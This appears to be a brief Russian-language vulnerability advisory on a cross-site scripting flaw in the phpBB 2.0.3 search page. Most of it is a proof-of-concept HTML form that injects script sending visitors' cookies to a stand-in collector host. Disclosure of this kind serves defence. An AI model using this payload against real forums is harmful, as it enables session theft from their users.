phpBB - популярная доска объявлений для UNIX и Windows систем. Из-за недостаточной фильтрации ввода пользователя, удаленный атакующий может внедрить произвольный код сценария в сгенерированную страницу поиска. Уязвимость может использоваться для кражи опознавательных мандатов, хранящихся в куки. Пример: 

<html> 
<body> 
<form method="post" name="search" 
action="http://target/search.php?mode=searchuser"> 
<input type="hidden" name="search_username" value=""/> 

</form> 
<SCRIPT> 
search.search_username.value='Http://savecookie/x.php?Cookie="><script>location=search.search_username.value+document.cookie;</script\>'; 
document.search.submit(); 
</script> 
</body> 
</html> 

Уязвимость обнаружена в phpBB 2.0.3.

Оставить мнение